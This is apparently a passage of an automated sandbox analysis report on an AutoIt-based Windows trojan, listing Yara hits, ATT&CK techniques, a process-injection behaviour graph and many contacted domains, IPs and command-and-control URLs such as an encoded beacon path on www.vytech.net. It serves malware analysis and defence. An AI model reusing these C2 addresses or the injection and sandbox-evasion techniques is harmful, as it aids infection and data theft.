          Source: Yara matchFile source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: file.exeBinary or memory string: WIN_81
          Source: file.exeBinary or memory string: WIN_XP
          Source: file.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
          Source: file.exeBinary or memory string: WIN_XPe
          Source: file.exeBinary or memory string: WIN_VISTA
          Source: file.exeBinary or memory string: WIN_7
          Source: file.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F18C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F18C4F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F1923B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00DDF160 RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,4_2_00DDF160
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          2
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          21
          Input Capture
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules
          2
          Valid Accounts
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol21
          Input Capture
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts
          3
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares3
          Clipboard Data
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation
          1
          DLL Side-Loading
          NTDS215
          System Information Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection
          1
          Masquerading
          LSA Secrets371
          Security Software Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Valid Accounts
          Cached Domain Credentials13
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
          Virtualization/Sandbox Evasion
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation
          Proc Filesystem11
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
          Process Injection
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579888 Sample: file.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 40 www.vytech.net 2->40 42 www.ux-design-courses-53497.bond 2->42 44 5 other IPs or domains 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 6 other signatures 2->56 11 file.exe 4 2->11         started        signatures3 process4 signatures5 66 Binary is likely a compiled AutoIt script file 11->66 68 Writes to foreign memory regions 11->68 70 Maps a DLL or memory area into another process 11->70 72 Switches to a custom stack to bypass stack traces 11->72 14 svchost.exe 11->14         started        process6 signatures7 78 Modifies the context of a thread in another process (thread injection) 14->78 80 Maps a DLL or memory area into another process 14->80 82 Sample uses process hollowing technique 14->82 84 3 other signatures 14->84 17 explorer.exe 27 1 14->17 injected process8 dnsIp9 36 lebahsemesta57.click 198.252.111.49, 49819, 80 SOFTLAYERUS Canada 17->36 38 www.vytech.net 45.38.60.47, 49772, 80 EGIHOSTINGUS United States 17->38 48 System process connects to network (likely due to code injection or exploit) 17->48 21 wlanext.exe 17->21         started        24 WerFault.exe 21 17->24         started        26 autoconv.exe 17->26         started        signatures10 process11 signatures12 58 Modifies the context of a thread in another process (thread injection) 21->58 60 Maps a DLL or memory area into another process 21->60 62 Tries to detect virtualization through RDTSC time measurements 21->62 64 Switches to a custom stack to bypass stack traces 21->64 28 explorer.exe 18 151 21->28         started        32 cmd.exe 1 21->32         started        process13 dnsIp14 46 www.7b5846.online 104.21.40.196, 49885, 80 CLOUDFLARENETUS United States 28->46 74 System process connects to network (likely due to code injection or exploit) 28->74 76 Query firmware table information (likely to detect VMs) 28->76 34 conhost.exe 32->34         started        signatures15 process16

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe32%ReversingLabsWin32.Trojan.AutoitInject
          file.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          lebahsemesta57.click
          198.252.111.49
          truetrue
            unknown
            www.vytech.net
            45.38.60.47
            truetrue
              unknown
              www.7b5846.online
              104.21.40.196
              truetrue
                unknown
                www.ux-design-courses-53497.bond
                unknown
                unknowntrue
                  unknown
                  www.imxtld.club
                  unknown
                  unknowntrue
                    unknown
                    www.lebahsemesta57.click
                    unknown
                    unknowntrue
                      unknown
                      api.msn.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://www.vytech.net/hwu6/?NvW8gh=3eE7W8JGsE0Z0gf0dkzWoMqC44Ih/LpQP6YOK8HSo/jc9NPr5lNFbiMzFCC+b/Y1vVpG&1bd=qBZpwRT8rpbTOZntrue
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.maheshg.xyzReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://aka.ms/odirmrexplorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://www.sugatoken.xyz/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                http://www.vytech.net/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.bethlark.topReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.inefity.cloud/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.migraine-treatment-36101.bond/hwu6/www.rider.visionexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.8e5lr5i9zu.buzz/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.7b5846.online/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.vibrantsoul.xyzReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2919550460.0000000004CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.edmaker.onlineReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 0000000E.00000002.2916503108.0000000002CC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      http://www.dental-implants-83810.bond/hwu6/www.8e5lr5i9zu.buzzexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://excel.office.comexplorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2759034207.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2755724636.0000000008C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.7b5846.onlineReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.04506.clubexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.66sodovna.net/hwu6/I:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.04506.club/hwu6/www.maheshg.xyzexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.lebahsemesta57.click/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.6vay.boats/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://www.dangdut4dselalu.pro/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.vibrantsoul.xyzexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.66sodovna.net/hwu6/www.04506.clubexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.otzen.info/hwu6/www.migraine-treatment-36101.bondexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.eternityzon.shop/hwu6/www.7b5846.onlineexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://www.66sodovna.netexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.maheshg.xyz/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.1669923079.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0tG-darkexplorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.lf758.vipexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.bethlark.topexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.ux-design-courses-53497.bond/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://www.vibrantsoul.xyz/hwu6/www.locerin-hair.shopexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://aka.ms/Vh5j3kPexplorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.imxtld.clubexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000002.2700282302.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1669923079.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.lf758.vipReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://wns.windows.com/Lexplorer.exe, 00000002.00000000.1669923079.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://word.office.comexplorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2759034207.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2755724636.0000000008C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.cloggedpipes.net/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.rider.visionReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.04506.club/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.6vay.boats/hwu6/www.66sodovna.netexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.stairr-lift-find.todayexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.04506.clubReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.inefity.cloud/hwu6/www.bethlark.topexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.ozzd86fih4.onlineReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.eternityzon.shopexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://schemas.micrexplorer.exe, 00000002.00000000.1667358180.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2809659599.000000000C857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2819005763.000000000C85E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://outlook.comexplorer.exe, 0000000E.00000003.2759034207.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2755724636.0000000008C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.apoppynote.com/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.otzen.infoexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.ux-design-courses-53497.bondexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://aka.ms/odirmPexplorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.locerin-hair.shop/hwu6/www.edmaker.onlineexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
